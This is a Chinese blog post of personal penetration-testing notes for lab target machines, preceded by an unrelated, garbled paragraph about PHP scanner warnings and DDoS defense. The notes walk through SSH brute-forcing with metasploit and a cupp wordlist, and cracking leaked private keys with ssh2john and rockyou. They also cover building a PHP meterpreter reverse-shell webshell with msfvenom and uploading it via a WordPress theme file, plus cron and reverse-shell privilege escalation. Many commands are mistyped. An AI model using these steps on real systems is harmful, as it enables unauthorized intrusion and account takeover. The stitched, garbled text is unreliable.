1、你的网种不是php开发的,但有运行php程序的权限,所以有php漏洞提示。
2、通用型的技术漏洞,不论什么语言都可以存在的,扫描的图个方便,直接说是php漏洞。
3、A语言请求的反应是正常的,但php请求的反应异常,属于中q型,可以不理。
4、真想不出,可能漏洞的名字,就叫“php漏洞”DDOS是带宽流量攻击对方利用网络流量来堵塞你的服务器网络从而导致用户无法访问的情况遇到这种攻击最明显的特征就是网站完全打不开而防御DDOS最主要是靠的硬防硬防越大防御能力也就越强 目前国内硬防比较好的比如杭州超级盾效果还是不错的但要明白的是防御只是减少了攻击所带来的影响并不是从根本上杜绝了攻击所以最好的解决方法还是要找到攻击者,双方协商解决。
本人笔记,仅供参考
相关靶机:
链接:>
提取码:qd32
渗透分析:
对于开启ssh服务的22端口的靶场优先考虑
1暴力破解
2私钥泄露
对于开放>
1通过浏览器访问对应靶场>
2使用探测工具对>
挖掘敏感信息:
使用浏览器对靶场IP的>
尤其对robotstxt、以及一些目录进行访问,挖掘具备利用价值的信息。对于开放ssh服务的靶场,务必要注意是否可以寻找到ssh私钥信息(id_ rsa);
对于某些靶场,也可以使用nikto扫描器来挖掘敏感信息;
-- nikto -host靶场IP地址
特别注意config等特殊敏感文件,要细读扫描的结果。挖掘可以利用的敏感信息;
登录服务器之后,我们需要做以下 *** 作。
1、查看当前用户whoami
2、id 查看当前用户的权限
3、查看根目录寻找flag文件
如果是root权限,那么表明这个靶场就被全部拿下。但是如果不是,就肯定需要提权。一
般情况下,flag文件只属于root用户和对应的用户组:
cat /etc/passwd查看所有用户的列装
cat /etc/group查看用户组
find / -user用户名查看属于某些用户的文件
/tmp查看缓冲文件目录
深入挖掘
通过/etc/crontab文件,设定系统定期执行的任务,编辑,需要roor权限。不同的用户都可以有不同的定时任务
cat /etc/crontab挖掘其他用户是否有定时任务,并查看对应的任务内容。执行的任务肯定对应靶场机器的某个文件。
如果在/etc/crontab下有某个用户的定时计划文件,但是具体目录下没有这个定时执行的文件,可以自行创建反dshell,然后netcat执行监听获取对应用户的权限。
如果有定时执行的文件,可以切换到对应的目录,查看对应的权限,查看当前用户是否具有读写权限。
万不得已的时候只能对ssh服务进行暴力破解。破解最后一个
用户名。破解工具如hydra、medusa等;
利用cupp创建字典
git clone >
chmod +x cupppy
/cupppy -i以交互的方式创建字典
输入用户名然后一直回车到Do you want to add some random numbers at the end of words输入yes其他全部no此时创建完成
之后推荐用metasploit破解ssh
在终端中输入
msfconsole
msf > use auxiliary/scaner/ssh/ssh_ login(使用该模块)
set rhosts 19216856103(确定ip地址)
set username 用户名(破解的用户名)
set pass_ file 用户名txt(刚刚创建的字典)
set threads 5(输入线程)
Run(进攻)
此时破解出密码例如123
直接连接,如果出现问题可以重启msfconsole,启用该模块后
set rhosts 19216856103 (连接远程主机)
set username hadi(用户名)
Set password 123(密码)
Run
界面简陋就使用python优化界面
Python -c “import pty;ptyspawn(‘/bin/bash’)”(优化界面)
此时可以把自己权限提升到root:
su - root
回到根目录ls打开flag文件
Ssh秘钥泄露
解密Ssh秘钥信息(以秘钥名id_isa举例)
Chmod 600 id_isa(赋予is_isa可读可写权限)
ssh2john id_isa > isacrack (就是用ssh2john把秘钥里的东西转换成john可识别的)
Zcat /usr/share/wordlists/rockyoutxtgz | john --pipe --rules rsacracks(利用rockyou字典解出所需要的东西)
制作webshell
msfvenom -p php/meterpreter/reverse_tcp Ihost=攻击机IP地址Iport=4444 -f raw > /root/Desktop/shellphp
启动监听
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
Weoshell
msf exploit(handler) > set Ihost攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler)> run
上传Webshell
使用找到的敏感信息登录系统后台,上传webshell。 执行
webshel(访问具有webshell的php页面)
获得反d的shell
--
wordpress上传点theme 404php
执行: >
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)